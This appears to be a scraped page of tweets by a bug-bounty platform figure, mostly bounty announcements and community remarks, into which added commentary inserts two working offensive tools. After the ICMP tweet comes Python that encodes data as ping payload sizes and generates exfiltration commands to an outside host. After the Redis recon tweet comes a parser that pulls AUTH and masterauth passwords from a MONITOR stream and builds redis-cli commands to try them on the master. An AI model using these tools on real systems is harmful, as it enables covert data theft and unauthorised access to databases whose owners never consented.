Happy Holi!
14
7
183
@jobertabma
Jobert Abma
3 years
Yay, I was awarded 40.8m2 bounty on @Hacker0x01 ! #TogetherWeCleanHarder
7
2
182
@jobertabma
Jobert Abma
7 years
Only outbound ICMP traffic allowed and can exec commands? Use to exfiltrate data via ICMP packet size.
2
84
182
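The tool the tweet links to is not on this page, so as an added example here is one possible encoding of the channel it describes, in my own Python, not the tool's code. Each byte of the data becomes one echo request whose payload length is BASE + byte, two out-of-range sizes frame a message, and the command generator emits the `ping -c 1 -s N` lines to run on the host that can only speak ICMP. Capturing the echo requests on the receiving side is out of scope; `decode` consumes the payload sizes as the listener recorded them. BASE and the framing sizes are choices made for the example.

```python
import shlex

# Layout of the covert channel (constructed for this example).  Each data
# byte is sent as one echo request whose payload length is BASE + byte, so
# the sizes 64..319 carry data; two sizes outside that range frame a message.
BASE = 64
START = BASE + 256   # 320
END = BASE + 257     # 321


def encode(data):
    """Payload sizes, in order, for the bytes of `data`."""
    return [START] + [BASE + b for b in data] + [END]


def ping_commands(data, host):
    """Shell commands to run on the host that can only speak ICMP.
    `ping -s N` sets the number of data bytes in each echo request."""
    return [f"ping -c 1 -s {size} {shlex.quote(host)}" for size in encode(data)]


def decode(observed_sizes):
    """Rebuild the message from the payload sizes seen by the listener.
    Sizes outside the data range (ordinary pings, noise) are ignored;
    returns None if the message was not seen in full."""
    out = bytearray()
    in_message = False
    for size in observed_sizes:
        if size == START:
            out.clear()
            in_message = True
        elif size == END and in_message:
            return bytes(out)
        elif in_message and BASE <= size < START:
            out.append(size - BASE)
    return None


if __name__ == "__main__":
    for cmd in ping_commands(b"id=0(root)", "203.0.113.10"):
        print(cmd)
    print(decode(encode(b"id=0(root)")))
```

One packet per byte is slow and loud; the point of the example is the mapping itself. A listener that sees `START`, a run of in-range sizes and `END` can decode, and anything arriving outside a frame (the default 56-byte pings of other hosts, for instance) is dropped rather than corrupting the message.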
@jobertabma
Jobert Abma
6 years
Hackers, we've built a mobile and a web CTF that gets you a trip to #h1702 during DEF CON in Las Vegas! If you're up for a challenge, check out . Best write-ups win!
6
72
180
@jobertabma
Jobert Abma
6 years
Great advice from @fransrosen on how to write a report title today: the title should answer the "WHAT", "WHERE", "WHY", and "HOW". Example: instead of "XSS", use "Reflected XSS on due to unsanitized fragment redirect using javascript protocol".
5
46
178
@jobertabma
Jobert Abma
2 years
Yay, I just paid two $12,500 bounties on @Hacker0x01 ! #TogetherWeHitHarder
4
0
178
@jobertabma
Jobert Abma
6 years
Hacker community, we need to discuss something that's at heart. There have been an increasing number of personal attacks lately, driving people out of the community and making people feel unsafe. I want to talk about values and the culture that I believe should be fostered.
9
41
178
@jobertabma
Jobert Abma
4 years
Hackers, starting today, you can get reputation for vulnerabilities you submit to @Facebook ’s bug bounty program (!) and you’ll be able to get paid through HackerOne for them as well. Welcome FB and happy hacking!
2
14
174
@jobertabma
Jobert Abma
7 years
Recon trick: found a Redis cluster and one of the servers doesn't require a password? Run MONITOR, wait for the master to sync, fetch the AUTH command with the password, and try using the password on the master server. #TogetherWeHitHarder
1
37
175
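The part of that trick you end up scripting is picking the credential out of the MONITOR stream, which is noisy on a busy server. As an added example (my own code, not a tool the tweet refers to), here is a parser for MONITOR's line format that unescapes quoted arguments and pulls out AUTH in both its forms (password only, and the Redis 6 ACL username plus password) as well as CONFIG SET of requirepass and masterauth, then builds the redis-cli command to try the credential on the master. The MONITOR sample is constructed; the line format itself is Redis' own.

```python
import re

# A MONITOR line looks like:  <timestamp> [<db> <client>] "CMD" "arg" ...
LINE_RE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')
ARG_RE = re.compile(r'"((?:\\.|[^"\\])*)"')
ESCAPE_RE = re.compile(r'\\(x[0-9a-fA-F]{2}|.)')


def _unescape(arg):
    """Undo Redis' quoting of arguments (backslash escapes, including \\xHH)."""
    def repl(m):
        esc = m.group(1)
        if esc.startswith("x"):
            return chr(int(esc[1:], 16))
        return {"n": "\n", "r": "\r", "t": "\t", "a": "\a", "b": "\b"}.get(esc, esc)
    return ESCAPE_RE.sub(repl, arg)


def parse_monitor(text):
    """Yield (timestamp, client, [args]) for every command line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # the "OK" banner, blank lines
        args = [_unescape(a) for a in ARG_RE.findall(m.group(4))]
        if args:
            yield m.group(1), m.group(3), args


def extract_credentials(text):
    """Credentials visible in a MONITOR stream: AUTH in both its forms and
    CONFIG SET of the two password settings.  Returns (source, user, password)."""
    creds = []
    for _, _client, args in parse_monitor(text):
        cmd = args[0].upper()
        if cmd == "AUTH" and len(args) == 2:
            creds.append(("AUTH", None, args[1]))
        elif cmd == "AUTH" and len(args) == 3:
            creds.append(("AUTH", args[1], args[2]))
        elif (cmd == "CONFIG" and len(args) == 4 and args[1].upper() == "SET"
              and args[2].lower() in ("requirepass", "masterauth")):
            creds.append((f"CONFIG SET {args[2].lower()}", None, args[3]))
    return creds


def redis_cli_args(host, cred):
    """redis-cli invocation to try a recovered credential against `host`."""
    _, user, password = cred
    args = ["redis-cli", "-h", host]
    if user:
        args += ["--user", user]
    return args + ["-a", password]


# Constructed MONITOR output for the demo.
MONITOR_SAMPLE = r'''OK
1700000000.123456 [0 10.0.0.12:41022] "PING"
1700000000.223456 [0 10.0.0.5:6379] "AUTH" "s3cr\"et\x21"
1700000001.000001 [0 10.0.0.5:6379] "REPLCONF" "listening-port" "6379"
1700000002.000001 [0 lua] "GET" "session:abc"
1700000003.000001 [0 10.0.0.7:50000] "auth" "app" "hunter2"
1700000004.000001 [0 10.0.0.7:50000] "CONFIG" "SET" "masterauth" "m4ster"
'''

if __name__ == "__main__":
    for cred in extract_credentials(MONITOR_SAMPLE):
        print(cred, " ".join(redis_cli_args("10.0.0.5", cred)))
```

Feed it `redis-cli -h <replica> MONITOR` output captured to a file; the client column tells you which peer sent the AUTH, which is the host worth trying the password on first. Note that MONITOR echoes every command, so the same stream will also contain whatever application secrets pass through SET and HSET.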
@jobertabma
Jobert Abma
3 years
Strength in numbers: since Friday, the hacker community has submitted close to 1,000 reports about CVE-2021-44228 to 249 customer programs on @Hacker0x01 , helping organizations discover faster, prioritize better, and remediate with more confidence.
4
25
174
@jobertabma
Jobert Abma
3 years
We just disclosed this beautifully written report and proof of concept from @Jafar_Abo_Nada : . Especially appreciated the additional feedback we got after mitigating the initial vulnerability. It’s worth reading!
1
32
171